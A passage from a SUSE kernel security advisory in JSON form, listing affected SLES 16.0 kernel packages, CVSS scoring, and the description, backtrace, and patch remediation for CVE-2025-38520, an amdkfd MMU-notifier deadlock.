"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38516"
},
{
"cve": "CVE-2025-38520",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38520"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Don\u0027t call mmput from MMU notifier callback\n\nIf the process is exiting, the mmput inside mmu notifier callback from\ncompactd or fork or numa balancing could release the last reference\nof mm struct to call exit_mmap and free_pgtable, this triggers deadlock\nwith below backtrace.\n\nThe deadlock will leak kfd process as mmu notifier release is not called\nand cause VRAM leaking.\n\nThe fix is to take mm reference mmget_non_zero when adding prange to the\ndeferred list to pair with mmput in deferred list work.\n\nIf prange split and add into pchild list, the pchild work_item.mm is not\nused, so remove the mm parameter from svm_range_unmap_split and\nsvm_range_add_child.\n\nThe backtrace of hung task:\n\n INFO: task python:348105 blocked for more than 64512 seconds.\n Call Trace:\n __schedule+0x1c3/0x550\n schedule+0x46/0xb0\n rwsem_down_write_slowpath+0x24b/0x4c0\n unlink_anon_vmas+0xb1/0x1c0\n free_pgtables+0xa9/0x130\n exit_mmap+0xbc/0x1a0\n mmput+0x5a/0x140\n svm_range_cpu_invalidate_pagetables+0x2b/0x40 [amdgpu]\n mn_itree_invalidate+0x72/0xc0\n __mmu_notifier_invalidate_range_start+0x48/0x60\n try_to_unmap_one+0x10fa/0x1400\n rmap_walk_anon+0x196/0x460\n try_to_unmap+0xbb/0x210\n migrate_page_unmap+0x54d/0x7e0\n migrate_pages_batch+0x1c3/0xae0\n migrate_pages_sync+0x98/0x240\n migrate_pages+0x25c/0x520\n compact_zone+0x29d/0x590\n compact_zone_order+0xb6/0xf0\n try_to_compact_pages+0xbe/0x220\n __alloc_pages_direct_compact+0x96/0x1a0\n __alloc_pages_slowpath+0x410/0x930\n __alloc_pages_nodemask+0x3a9/0x3e0\n do_huge_pmd_anonymous_page+0xd7/0x3e0\n __handle_mm_fault+0x5e3/0x5f0\n handle_mm_fault+0xf7/0x2e0\n hmm_vma_fault.isra.0+0x4d/0xa0\n walk_pmd_range.isra.0+0xa8/0x310\n walk_pud_range+0x167/0x240\n walk_pgd_range+0x55/0x100\n __walk_page_range+0x87/0x90\n walk_page_range+0xf6/0x160\n hmm_range_fault+0x4f/0x90\n amdgpu_hmm_range_get_pages+0x123/0x230 [amdgpu]\n amdgpu_ttm_tt_get_user_pages+0xb1/0x150 [amdgpu]\n init_user_pages+0xb1/0x2a0 [amdgpu]\n amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu+0x543/0x7d0 [amdgpu]\n kfd_ioctl_alloc_memory_of_gpu+0x24c/0x4e0 [amdgpu]\n kfd_ioctl+0x29d/0x500 [amdgpu]\n\n(cherry picked from commit a29e067bd38946f752b0ef855f3dfff87e77bec7)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38520",
"url": "https://www.suse.com/security/cve/CVE-2025-38520"
},
{
"category": "external",
"summary": "SUSE Bug 1248217 for CVE-2025-38520",
"url": "https://bugzilla.suse.com/1248217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
